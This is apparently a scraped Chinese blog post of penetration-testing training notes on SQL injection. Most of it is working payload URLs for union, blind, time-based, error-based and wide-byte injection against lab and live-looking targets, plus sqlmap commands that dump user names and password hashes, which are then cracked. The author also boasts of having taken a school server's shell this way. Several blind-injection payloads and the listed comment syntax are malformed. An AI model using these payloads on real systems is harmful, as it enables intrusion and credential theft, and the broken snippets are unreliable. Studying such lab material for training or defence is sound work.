梦想闹钟
梦想闹钟

cisp-pte集训笔记第三天

第三天讲了sql注入,给了测试网站,在通知页面有一个注入点
cisp-pte集训笔记第三天_第1张图片
构造payload:

http://219.153.49.228:46485/new_list.php?id=1 and 1=1 order by 1
http://219.153.49.228:46485/new_list.php?id=1 and 1=1 order by 2

一直试到order by 5会返回白页面,所以可知这个页面有4个字段。Order by是索引排序。%20是url编码,空格变成%20

接下来寻找回显点

http://219.153.49.228:46485/new_list.php?id=-1 union select 3,4,5,6

cisp-pte集训笔记第三天_第2张图片
Id=-1返回白页,如果使用id=1会导致页面被盖掉。Union select 是联合查询,比较常见的注入点,特别是这种通知公告页面,我之前的就是通过通知公告页面+联合查询拿到了学校服务器的shell。通过select 3,4,5,6来确认回显点,可以知道4和5的位置是回显点

接下来通过database()函数和user()函数来确认库名和用户名

http://219.153.49.228:46485/new_list.php?id=-1%20union%20select%203,user(),5,6

cisp-pte集训笔记第三天_第3张图片

http://219.153.49.228:46485/new_list.php?id=-1%20union%20select%203,user(),5,6

cisp-pte集训笔记第三天_第4张图片

http://219.153.49.228:46485/new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()--%20-

Group concat是将查询结果拼成一个字符串,因为所有库的信息都保存在schema.tables里,所以先通过schema.tables查表名
cisp-pte集训笔记第三天_第5张图片
接下来查表里字段名

http://219.153.49.228:46485/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%22StormGroup_member%22

cisp-pte集训笔记第三天_第6张图片
根据字段名提取信息

http://219.153.49.228:46485/new_list.php?id=-1 union select 1,group_concat(name),3,4 from StormGroup_member

cisp-pte集训笔记第三天_第7张图片
接下来提密码password

http://219.153.49.228:46485/new_list.php?id=-1 union select 1,group_concat(password),3,4 from StormGroup_member

cisp-pte集训笔记第三天_第8张图片
放到somd5里解密
cisp-pte集训笔记第三天_第9张图片
cisp-pte集训笔记第三天_第10张图片
然后就成功了
cisp-pte集训笔记第三天_第11张图片

接下来是尝试用sql-lab练习sql注入
Lesson-1
建议进入php文件,添加echo语句,让自己能看到构造的语句是啥样子,方便学习
cisp-pte集训笔记第三天_第12张图片
cisp-pte集训笔记第三天_第13张图片
Mysql注释符有3种:

1、#… "#"注释. 以#开头的一句表示注释一行如:
2、-- -,注意–后面有一个空格-
3、//

试一下 – -
cisp-pte集训笔记第三天_第14张图片
构造payload,使用order by来看下有多少个字段,试到4报错说明有3个字段
cisp-pte集训笔记第三天_第15张图片
接下来用一个单引号闭合掉id=1,然后再使用-- -注释掉后面语句,找到回显点

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,2,3%20--%20-

cisp-pte集训笔记第三天_第16张图片
看库名

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,database(),user()%20--%20-

cisp-pte集训笔记第三天_第17张图片

同样的方式,用union select从information_schema.tables 里读取表信息

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--%20-

cisp-pte集训笔记第三天_第18张图片
然后继续读取表里列名

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--%20-

cisp-pte集训笔记第三天_第19张图片

继续,尝试读取username和password

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(username),3%20from%20users--%20-

cisp-pte集训笔记第三天_第20张图片

http://localhost/sqli-labs-master/Less-1/?id=-1%27%20union%20select%201,group_concat(password),3%20from%20users%20where%20username=%27admin%27--%20-

通过这样就直接可以得到用户的密码了
cisp-pte集训笔记第三天_第21张图片
以上就是基础手注的过程,接下来是用sql-lab 第5关理解盲注
构造几个payload发现,没有回显了
cisp-pte集训笔记第三天_第22张图片
盲注举例:实质就是用大量判断来逐个确定字符,因为工作量巨大,所以实际需要通过sqlmap和python脚本来实现。试几次后就能发现?id=1’ and length(database())=8-- -能返回正确页面,=7或=9都报错,说明库名就是8个字符(security)

猜测数据库

?id=1' and length(database())=8-- -
id=1' and left(database(),1)>'a' -- - 1
id=1' and left(database(),1)>'z' -- - 0

在a-z之间

id=1' and left(database(),1)>'r' -- -1
id=1' and left(database(),1)>'s' -- -0
id=1' and left(database(),2)>'sa'-- -

通过ascii码比较来筛选字符

猜测表

id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1)b,1))>n

a是从0开始第几个表,b是为第几个字符,n是ASCII所对应的十进制数
第一个表

ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101

第二个表

ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判断user表

http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段

http://localhost/Tkitn/sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

可以看到还是比较麻烦的,实际中用的还是sqlmap
sqlmap用法:
# 检测注入点是否可用

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’

#可曝出该mysql中所有数据库名称

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’ --dbs 

#web当前使用的数据库

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-db 

#web数据库使用账户

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --current-user

#列出sql所有用户

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’ --users 

#数据库账户与密码

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' --passwords 

#输出所有的表

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’ --tables 

#-D 指定数据库名

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 --tables

#-T:指定要列出字段的表   --columns 列出了所有的列字段

sqlmap -u 'http://192.168.87.19/index.php?r=default/news/content&id=12' -D 【数据库名】 -T 【表名】 --columns 

# -C :指定要暴的字段

sqlmap -u ‘http://192.168.87.19/index.php?r=default/news/content&id=12’ -D 【数据库名】 -T 【表名】 -C“username,realname,password” --dump 

基于时间的盲注,最麻烦也最耗时的注入

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php?id=1%27%20and%20sleep(6)--%20-

其中sleep(6)就是停6秒

通过以下语句来检查,和之前的盲注是一个原理,如果符合条件则页面响应时间边长

id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))-- -

substr就是取database()字符串的前1位,115是s的ascii码值
ascii(substr(database(),2,1)就是取字符串第二位,

接下来是报错注入,通过报错看信息,但还是需要回显点:
看版本

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php
?id=2' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) -- -

看库名

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php
?id=2' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- -

看列名

http://192.168.255.199/Tkitn/sqli-labs-master/Less-5/index.php
?id=2' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name="users" limit 0,1),0x7e),1)-- -

在sql-lab第5关即可实验报错注入,注意在注列名的时候只会出现一个字段,通过修改limit参数可以逐一把字段名读出来

0x7E是 ~符号

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值
cisp-pte集训笔记第三天_第23张图片

练习:pikachu平台
cisp-pte集训笔记第三天_第24张图片
直接burp抓包-》send to repater
更改id字段尝试注入,和之前的知识点一样

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -

cisp-pte集训笔记第三天_第25张图片
此外,将burp里面的包copy下来放到txt里,使用sqlmap -r xxx.txt即可使用sqlmap 来跑

还有一种变化的万能密码,不过没有注入的情况下还有万能密码这种还是很少见的,最好还是抓包 sqlmap -r 跑
如 ’ or ‘1’=‘1’#

宽字节注入:
gbk编码,默认是两个字节当做中文处理,用%df来处理掉\符号,sqlmap需要特殊构造下才能跑出来

sqlmap -u "chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df'"

注意宽字节注入时表名,库名使用单引号会出问题,需要将名字转成16进制才行
如table_name=0x67626b73716c69

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=-1%df%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x67626b73716c69--%20-

你可能感兴趣的:(信息安全)

  • 信息安全专业毕业设计题目汇总:网络安全 微光DeepLearning 毕设选题信息安全毕业设计算法
    亲爱的同学们,转眼间我们已经迎来了大四,这一年充满了挑战与机遇。大家忙着备考研究生、公务员、教师资格证,或是寻找实习机会,同时还要面对毕业设计的重任。对于毕业设计,很多同学可能会感到陌生,不知道从何下手,也不确定自己适合哪些方向的课题。为此,我整理了一个毕业设计选题专栏,希望能为大家提供一些灵感和建议。无论你对毕业设计有任何疑问,欢迎随时来问我哦!对毕设有任何疑问都可以问学长哦!前言在计算机专业的
  • 企业文件安全管理基础及防范策略 够快云库 企业数据安全企业文件安全
    随着信息化进程的不断推进,企业在数字化转型过程中面临大量敏感数据的存储与传输问题。文件作为企业核心数据的载体,其安全性直接关系到企业的信息安全和业务连续性。因此,构建科学严谨的文件安全管理体系显得尤为关键。一、文件安全管理的重要性数据泄露风险企业内部员工、外部攻击者或第三方供应商的不当操作均可能导致敏感文件泄露,给企业带来巨大经济与信誉损失。法律合规要求随着GDPR、ISO27001等数据保护法规
  • 量子计算信息安全威胁与应对 岛屿旅人 网络安全行业分析量子计算web安全人工智能安全网络网络安全
    文章目录前言一、量子计算信息安全威胁及影响1.2量子计算发展迅速,安全威胁日益迫近二、PQC研究与应用进展2.1欧美在PQC领域研究近三十年,积累深厚2.2NIST引领PQC标准制定,取得初步成果2.3美国全方位布局加快推动PQC迁移与应用三、PQC应用发展前景3.1PQC算法和应用安全性需进一步验证3.2PQC算法国际标准将持续开展研究3.3PQC升级迁移是一项长期系统性工程四、QKD技术优劣势
  • 信息安全之网络安全 黑客Jack web安全安全
    网络安全技术是一类包含内容极其广泛的技术,广义上说任何检测、防御和抵制网络攻击的技术都属于网络安全技术,而且很多网络安全技术都是攻击驱动型的。网络安全大致包含的内容主要有防火墙,入侵检测,漏洞扫描与网络隔离,拒绝服务攻击检测与防御,计算机病毒防治以及×××技术的概念、原理、应用部署等方面。防火墙防火墙是设置在内部网络与外部网络(如互联网)之间,实施访问控制策略的一个或者一组系统,是访问控制机制在网
  • 工业物联网远程监控系统优化方案,基于巨控GRM553Y-CHE 何工13763355074 物联网巨控GRM553Y-C巨控GRM552Y-C
    工业物联网远程监控系统优化方案——基于巨控GRM553Y-CHE的西门子S7-1500PLC多站点无线集成方案1.项目背景与概述巨控科技作为工业物联网解决方案提供商,专注于PLC无线通信与远程监控技术研发,其YunPLC安全平台已服务超30,000+工业终端,覆盖智能制造、智慧能源、环保监测等20余个行业,累计稳定运行超10亿小时。平台通过信息安全管理体系认证及工业网络安全认证,确保数据全程加密与
  • 助力网络安全发展,安全态势攻防赛事可视化 网络安全-杰克 安全web安全网络
    前言互联网网络通讯的不断发展,网络安全就如同一扇门,为我们的日常网络活动起到拦截保护的作用。未知攻、焉知防,从网络诞生的那一刻开始,攻与防的战争就从未停息过,因此衍生出了大量网络信息安全管理技能大赛,以此提升社会网络安全责任意识,加强网络安全技术人才队伍的建设。我们也通过Hightopo的产品HT搭建了一款技术人员之间的技术竞赛可视化大屏。模拟一场网络空间里的竞技守卫战,让原本枯燥的信息竞赛通过H
  • 标准应用 | 2025年网络安全服务成本度量实施参考 安全大哥 Web渗透测试应用安全web安全网络安全
    01网络安全服务成本度量依据相关新变化为了解决我国网络安全服务产业发展中面临的服务供需两方对于服务成本组成认知偏差较大、网络安全服务成本度量缺乏依据的问题,中国网络安全产业联盟(CCIA)组织北京赛西科技发展有限责任公司、北京安信天行科技有限公司等21家相关单位共同研究制定了GB/T42461-2023《信息安全技术网络安全服务成本度量指南》(以下简称“标准”)。该标准以原劳动和社会保障部发布的《
  • 大学信息安全技术 期末考试复习题 网络安全Max 网络
    一、单选题(一)1、在以下人为的恶意攻击行为中,属于主动攻击的是()AA.数据篡改及破坏B.数据窃听C.数据流分析D.非法访问2、数据完整性指的是()CA.保护网络中各系统之间交换的数据,防止因数据被截获而造成泄密B.提供连接实体身份的鉴别C.防止非法实体对用户的主动攻击,保证数据接受方收到的信息与发送方发送的信息完全一致D.确保数据数据是由合法实体发出的3、CA指的是:()AA.证书授权B.加密
  • 新手必看——ctf六大题型介绍及六大题型解析&举例解题 沛哥网络安全 web安全学习安全udp网络协议
    CTF(CaptureTheFlag)介绍与六大题型解析一、什么是CTF?CTF(CaptureTheFlag),意为“夺旗赛”,是一种信息安全竞赛形式,广泛应用于网络安全领域。CTF竞赛通过模拟现实中的网络安全攻防战,让参赛者以攻防对抗的形式,利用各种信息安全技术进行解决一系列安全问题,最终获得“旗帜(Flag)”来获得积分。CTF赛事一般分为两种形式:Jeopardy(解题模式):参赛者通过解
  • Web应用安全威胁与防护措施 星环之光 网络安全网络web安全
    本文已收录至《全国计算机等级考试——信息安全技术》专栏由于极其容易出现漏洞、并引发安全事故,因此数据隐私的保护是目前绝大多数企业不可绕过的运维环节。不过,许多中小型企业往往会错误地认为只有大型企业才会成为黑客的目标。而实际统计数字却截然不同:有43%的网络犯罪恰恰是针对小型企业的。而且,无论是系统陈旧且未给漏洞打上安全补丁,还是各种恶意软件,甚至是一些人为的错误,都可以成为系统的受攻击面。如果仔细
  • 电脑文件防泄密软件 Tianrui Green Shield 天锐绿盾企业图档防泄密软件公司内部文件资料加密软件天锐绿盾图纸加密源代码安全开发部门源代码防止泄露电脑文件防泄密软件
    天锐绿盾电脑文件防泄密软件是一款专注于企业数据防泄密的安全管理软件,致力于为企业提供全方位的数据安全保障。以下是对该软件的详细介绍:一、软件概述天锐绿盾(又名绿盾信息安全管理软件)是一款功能强大的企业加密软件,它通过在操作系统的核心驱动层实施文件透明加密,确保所有受保护的文档(如设计图纸、源代码、办公文档等)在创建、编辑、保存时自动加密。加密过程对员工透明,不影响日常操作,同时能够严防数据泄密。二
  • 技术革新让生活更便捷 巴巴郭海鹄 生活量子计算经验分享
    量子通信是一种利用量子力学原理进行信息传递的技术。它的基本原理是量子纠缠和量子密钥分发。量子纠缠指两个粒子即使相隔很远,一个粒子的状态改变会立刻引起另一个粒子状态的相应变化。量子密钥分发则是通过量子态传输实现加密密钥的安全交换。在信息安全领域,量子通信具有显著优势。传统加密方法依赖于复杂的数学问题,但未来可能被量子计算机解密。而量子通信利用量子力学的不确定性,提供了一种理论上无法被窃听的安全通信方
  • Struts2 命令执行漏洞 S2-045 复现:深入剖析与实战演练 垚垚 Securify 前沿站 十大漏洞网络系统安全web安全struts安全计算机网络后端
    目录前言一、漏洞原理:框架解析缺陷引发的安全危机二、复现环境搭建:搭建模拟战场,重现漏洞场景三、复现步骤:步步为营,揭开漏洞利用的面纱四、漏洞危害与修复建议:正视漏洞危害,筑牢安全防线前言在当今网络安全形势日益严峻的大环境下,Web应用框架的安全问题始终是信息安全领域关注的焦点。Struts2作为一款广泛应用于JavaWeb开发的开源框架,其安全性直接关系到众多Web应用的稳定运行。今天,我们将深
  • 【网络安全】基础知识详解(非常详细)零基础入门到精通,收藏这一篇就够了_网络安全的入门基础知识 QXXXD wireshark测试工具网络arm开发开发语言运维java
    一、什么是网络安全?百度上对“网络安全”是这么介绍的:“网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露、系统连续可靠正常地运行,网络服务不中断。”嗯…是不是感觉有点抽象。那么我们再换一种表述:网络安全就是维护网络系统上的信息安全。这里又涉及到一个名词“信息安全”。那么信息安全又是什么呢?信息安全是指保护计算机硬件、软件、数据等不因偶然和恶
  • 软考信息安全工程师好考吗? 欧气满满o 系统安全网络安全软考
    信息安全工程师是近几年新增的中级考试科目,一般在一年中的下半年考试,难度还是有的,但是只要你有恒心,愿意付出,认真刷题备考,拿下证书还是没有问题的!一、考试题型设置(1)网络信息安全基础知识和技术,考试时间为150分钟,笔试,75道选择题;(2)网络信息安全工程与综合应用实践,考试时间为150分钟,笔试,一般为4道问答题。满分都为75分,历年的合格线都是45(包含45分),考试一次需要两个科目同时
  • 网络安全概论 网络安全(华哥) 计算机网络安全网络工程师web安全安全网络
    网络安全概论--网络基础知识--防火墙技术--身份识别技术--虚拟专用网络--入侵检测技术--病毒和恶意代码--业务连续性计划--安全管理--信息系统安全方案设计方法一、网络安全面临的威胁物理安全威胁、操作系统的安全缺陷、网络协议的安全缺陷、应用软件的实现缺陷、用户使用的缺陷和恶意程序等6个方面的安全威胁。二、物理安全问题的重要性信息安全首先要保障信息的物理安全。物理安全是指在物理介质层次上对存储
  • 基于OCR的小猿口算比大小脚本 真理Eternal ocr
    刚做完OCR,赛季就更新到网络信息安全攻防战了。。视觉已死,抓包当道,你要问我怎么抓包?嘿嘿,不会环境IntelliJIDEACommunityEdition2024.2.1安装python插件:新建项目---通过插件获取更多语言---pythonPycharm也是可以的,只是我没装安装一个模拟器,没有要求,能运行手机程序就行在模拟器里运行小猿口算安装OCR这里是链接tesseract-ocr·G
  • 大数据安全 w程序員 大数据数据安全
    引言大数据时代来临,各行业数据规模呈TB级增长,拥有高价值数据源的企业在大数据产业链中占有至关重要的核心地位。在实现大数据集中后,如何确保网络数据的完整性、可用性和保密性,不受到信息泄漏和非法篡改的安全威胁影响,已成为政府机构、事业单位信息化健康发展所要考虑的核心问题。大数据安全概况a)标准化现状:网络安全等级保护大数据安全扩展要求等级保护对象1.0中定义为:“信息安全等级保护工作直接作用的具体信
  • 数据安全与个性化并重:板栗看板成为企业私有化部署首选 团队管理
    在数字化转型浪潮下,协同办公软件已成为企业运营的核心基础设施。随着数据安全意识的提升和信息安全法规的完善,越来越多的企业开始关注协同办公软件的私有化部署。私有化部署不仅能够满足企业对数据安全的严格要求,更能根据企业需求进行深度定制,实现效率的全面提升。一、协同办公软件私有化的必然趋势企业数据资产的价值日益凸显,数据泄露事件频发使企业面临巨大的经营风险。公有云服务虽然便捷,但数据存储在第三方平台始终
  • 高项拿了62,一些暗黑偏方给到软考人 w011109 软件工程模块测试计算机网络软件构建pat考试
    高项拿了62,一些暗黑偏方给到软考人⏩高项备考重点✓信息安全工程——主要考察选择题、可能考案例✓项目管理概论——选择、案例都是重.点✓启动过程组——选择、案例都是重.点✓规划过程组——选择、案例都是重.点✓执行过程组——选择、案例都是重.点✓监控过程组——选择、案例都是重.点✓收尾过程组——选择、案例都是重.点✓组织保障——选择、案例都是重.点✓监理基础知识——选择是重.点✓法律法规和标准规范——
  • 前沿科技:改变未来的五大创新技术 巴巴郭海鹄 科技人工智能经验分享
    量子通信技术是一种基于量子力学原理的新型通信方式。它利用量子态的特性进行信息传输,具有极高的安全性。这项技术的核心是量子密钥分发,通过量子纠缠现象实现密钥的安全传递。在信息安全领域,量子通信展现出独特优势。传统加密方法可能被解密,但量子通信利用量子态不可复制的特性,一旦被窃听就会改变量子态,立即被发现。这种特性使得量子通信在军事、金融等对安全性要求极高的领域具有重要应用价值。目前,量子通信技术已经
  • 网络安全 纵向是什么意思 网络安全维度 网络安全Ash web安全php安全网络
    信息安全工程师-网络信息安全概述网络信息安全相关概念网络信息安全的发展历经了通信保密、计算机安全、信息保障、可信计算等阶段。狭义上的网络信息安全特指网络信息系统的各组成要素符合安全属性的要求,即机密性、完整性、可用性、抗抵赖性、可控性。广义上的网络信息安全是涉及国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”。根据网络安全法中的解释,网络安全是指通过采取必要措施,防范对
  • 怎么用卡车和光纤运数据?为什么卡车运数据比光纤快? 田鑫科技 网络专线数据中心数据运输光纤运数据卡车运数据
    使用卡车和光纤来运输数据是两种不同的方式,它们各有特点,并且适用于不同的情境。卡车运数据如何用卡车运数据:准备存储设备:首先需要准备好足够容量的硬盘、SSD或其他类型的存储介质,将要传输的数据复制到这些设备上。装载与保护:将装有数据的存储设备安全地装载到卡车上。为了保证数据的安全性,通常会对存储设备进行物理保护,比如使用抗震包装材料,同时可能还会采用加密技术确保信息安全。运输:安排卡车从起始地点出
  • 网络安全和信息安全 黑龙江亿林等级保护测评 安全web安全网络物联网ddos
    概述信息安全、网络安全与网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。信息安全信息安全主要是指保护信息系统(包括硬件、软件、数据、人、物理环境及其组合)免受偶然或恶意的原因导致的破坏、更改、泄露等问题,确保信息的保密性、真实性和完整性,以及未授
  • 2024信息安全网络安全等安全意识(附培训PPT下载) 安全方案 web安全安全网络
    信息安全和网络安全是现代社会中至关重要的领域,它们涉及保护数据、系统和网络免受未经授权的访问、破坏和滥用。以下是一些关键的安全意识和概念:信息安全意识数据保护:意识到个人和组织数据的敏感性和价值,采取措施保护数据不被泄露、篡改或丢失。例如,使用强密码、定期备份数据、加密敏感信息等.身份验证和授权:理解身份验证(验证用户身份)和授权(控制用户访问权限)的重要性,确保只有授权人员才能访问敏感数据和系统
  • 网络安全应急响应流程图 网络安全Jack web安全流程图安全
    一、网络安全应急响应建设的背景和现状当前,许多地区和单位已经初步建立了网络安全预警机制,实现了对一般网络安全事件的预警和处置。但是,由于网络与信息安全技术起步相对较晚,发展时间较短,与其他行业领域相比,其专项应急预案、应急保障机制和相关的技术支撑平台都还在不断发展中。各政府机构、企业也根据自身情况,设计了服务于自身的网络与信息安全应急预案,建立有相应的制度流程和保障队伍,但相关的应急流程和保障措施
  • 【零基础到精通】小白如何自学网络安全 黑客demon web安全网络安全计算机网络黑客技术网络安全
    小白人群想学网安但是不知道从哪入手?一篇文章告诉你如何在4个月内吃透网安课程,掌握网安技术一、基础阶段1.了解网安相关基础知识了解中华人民共和国网络安全法、熟知网络安全的相关概念:包括信息安全、风险管理、网络攻防原理、认证与加密等基本概念,Linux操作系统Linux操作系统目录结构Linux命令格式Linux文件和目录操作命令Linux用户和用户组操作命令Linux查看和操作文件内容命令3.计算
  • 笔记:JAVA WEB 入门(c/s架构、b/s架构、http协议工作原理) JL.玖离 java服务器
    1.B/S与C/S的区别?1.1C/S架构:客户端/服务器.C/S架构的优点:客户端与服务器端直接相连用户的程序主要在客户端,服务器端主要提供数据管理、数据共享、数据及系统维护和并发控制等,客户端程序主要完成用户的具体的业务通过将任务合理分配到客户端和服务器,降低了系统的通讯开销C/S一般面向相对固定的用户群,对信息安全的控制能力很强C/S架构的缺点:需要安装客户端才可进行管理操作在本地安装时,如
  • 第一章,信息安全概述 freshman_start 防护保护安全web安全
    什么是信息?------信息是通过施加于数据上的某种约定而赋予这些数据的含义。什么是信息安全?ISO----->数据处理系统建立和采取技术、采取技术、管理的安全保护,用来保护计算机硬件、软件、数据不因为偶然的或恶意的原因遭受到破环。美国----->防止未经授权的访问、使用、披露、中断、记录、破坏等行为作用对象:数据本身国家网络安全法--->通过采用必要措施,防范对网络的攻击、入侵、干扰、破坏和非法
  • 基于云计算的自然资源视频监控系统设计与研究 罗伯特之技术屋 大数据与数字化的设计应用专栏云计算音视频
    摘要为了解决当前自然资源执法监管信息化系统存在的问题,满足对违法行为进行实时发现的需求,构建一个覆盖全省的实时监控视频系统。该系统基于云计算和视频中台等技术构建了两级云架构的视频处理与存储系统,通过AI等大数据算法对数据进行整合、分析,进而构建了具有执法线索、监督问效、行动处置和综合指挥等功能的自然资源管理系统。同时,该系统遵循安全等级保护三级要求,确保网络与信息安全,助力自然资源监管数字化。引言
  • LeetCode[位运算] - #137 Single Number II Cwind javaAlgorithmLeetCode题解位运算
    原题链接:#137 Single Number II  要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现三次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间   难度:中等   分析: 与#136类似,都是考察位运算。不过出现两次的可以使用异或运算的特性 n XOR n = 0, n XOR 0 = n,即某一
  • 《JavaScript语言精粹》笔记 aijuans JavaScript
    0、JavaScript的简单数据类型包括数字、字符创、布尔值(true/false)、null和undefined值,其它值都是对象。 1、JavaScript只有一个数字类型,它在内部被表示为64位的浮点数。没有分离出整数,所以1和1.0的值相同。 2、NaN是一个数值,表示一个不能产生正常结果的运算结果。NaN不等于任何值,包括它本身。可以用函数isNaN(number)检测NaN,但是
  • 你应该更新的Java知识之常用程序库 Kai_Ge java
    在很多人眼中,Java 已经是一门垂垂老矣的语言,但并不妨碍 Java 世界依然在前进。如果你曾离开 Java,云游于其它世界,或是每日只在遗留代码中挣扎,或许是时候抬起头,看看老 Java 中的新东西。 Guava Guava[gwɑ:və],一句话,只要你做Java项目,就应该用Guava(Github)。 guava 是 Google 出品的一套 Java 核心库,在我看来,它甚至应该
  • HttpClient 120153216 httpclient
    /** * 可以传对象的请求转发,对象已流形式放入HTTP中 */ public static Object doPost(Map<String,Object> parmMap,String url) { Object object = null; HttpClient hc = new HttpClient(); String fullURL
  • Django model字段类型清单 2002wmj django
    Django 通过 models 实现数据库的创建、修改、删除等操作,本文为模型中一般常用的类型的清单,便于查询和使用: AutoField:一个自动递增的整型字段,添加记录时它会自动增长。你通常不需要直接使用这个字段;如果你不指定主键的话,系统会自动添加一个主键字段到你的model。(参阅自动主键字段) BooleanField:布尔字段,管理工具里会自动将其描述为checkbox。 Cha
  • 在SQLSERVER中查找消耗CPU最多的SQL 357029540 SQL Server
    返回消耗CPU数目最多的10条语句 SELECT TOP 10    total_worker_time/execution_count AS avg_cpu_cost, plan_handle,    execution_count,    (SELECT SUBSTRING(text, statement_start_of
  • Myeclipse项目无法部署,Undefined exploded archive location 7454103 eclipseMyEclipse
    做个备忘! 错误信息为:       Undefined exploded archive location 原因:           在工程转移过程中,导致工程的配置文件出错; 解决方法:    
  • GMT时间格式转换 adminjun GMT时间转换
    普通的时间转换问题我这里就不再罗嗦了,我想大家应该都会那种低级的转换问题吧,现在我向大家总结一下如何转换GMT时间格式,这种格式的转换方法网上还不是很多,所以有必要总结一下,也算给有需要的朋友一个小小的帮助啦。 1、可以使用 SimpleDateFormat SimpleDateFormat    EEE-三位星期 d-天 MMM-月 yyyy-四位年
  • Oracle数据库新装连接串问题 aijuans oracle数据库
    割接新装了数据库,客户端登陆无问题,apache/cgi-bin程序有问题,sqlnet.log日志如下: Fatal NI connect error 12170.   VERSION INFORMATION:         TNS for Linux: Version 10.2.0.4.0 - Product
  • 回顾java数组复制 ayaoxinchao java数组
    在写这篇文章之前,也看了一些别人写的,基本上都是大同小异。文章是对java数组复制基础知识的回顾,算是作为学习笔记,供以后自己翻阅。首先,简单想一下这个问题:为什么要复制数组?我的个人理解:在我们在利用一个数组时,在每一次使用,我们都希望它的值是初始值。这时我们就要对数组进行复制,以达到原始数组值的安全性。java数组复制大致分为3种方式:①for循环方式 ②clone方式 ③arrayCopy方
  • java web会话监听并使用spring注入 bewithme Java Web
            在java web应用中,当你想在建立会话或移除会话时,让系统做某些事情,比如说,统计在线用户,每当有用户登录时,或退出时,那么可以用下面这个监听器来监听。        import java.util.ArrayList; import java.ut
  • NoSQL数据库之Redis数据库管理(Redis的常用命令及高级应用) bijian1013 redis数据库NoSQL
    一 .Redis常用命令         Redis提供了丰富的命令对数据库和各种数据库类型进行操作,这些命令可以在Linux终端使用。         a.键值相关命令         b.服务器相关命令 1.键值相关命令       &
  • java枚举序列化问题 bingyingao java枚举序列化
    对象在网络中传输离不开序列化和反序列化。而如果序列化的对象中有枚举值就要特别注意一些发布兼容问题: 1.加一个枚举值 新机器代码读分布式缓存中老对象,没有问题,不会抛异常。 老机器代码读分布式缓存中新对像,反序列化会中断,所以在所有机器发布完成之前要避免出现新对象,或者提前让老机器拥有新增枚举的jar。 2.删一个枚举值 新机器代码读分布式缓存中老对象,反序列
  • 【Spark七十八】Spark Kyro序列化 bit1129 spark
    当使用SparkContext的saveAsObjectFile方法将对象序列化到文件,以及通过objectFile方法将对象从文件反序列出来的时候,Spark默认使用Java的序列化以及反序列化机制,通常情况下,这种序列化机制是很低效的,Spark支持使用Kyro作为对象的序列化和反序列化机制,序列化的速度比java更快,但是使用Kyro时要注意,Kyro目前还是有些bug。 Spark
  • Hybridizing OO and Functional Design bookjovi erlanghaskell
      推荐博文: Tell Above, and Ask Below - Hybridizing OO and Functional Design 文章中把OO和FP讲的深入透彻,里面把smalltalk和haskell作为典型的两种编程范式代表语言,此点本人极为同意,smalltalk可以说是最能体现OO设计的面向对象语言,smalltalk的作者Alan kay也是OO的最早先驱,
  • Java-Collections Framework学习与总结-HashMap BrokenDreams Collections
            开发中常常会用到这样一种数据结构,根据一个关键字,找到所需的信息。这个过程有点像查字典,拿到一个key,去字典表中查找对应的value。Java1.0版本提供了这样的类java.util.Dictionary(抽象类),基本上支持字典表的操作。后来引入了Map接口,更好的描述的这种数据结构。  &nb
  • 读《研磨设计模式》-代码笔记-职责链模式-Chain Of Responsibility bylijinnan java设计模式
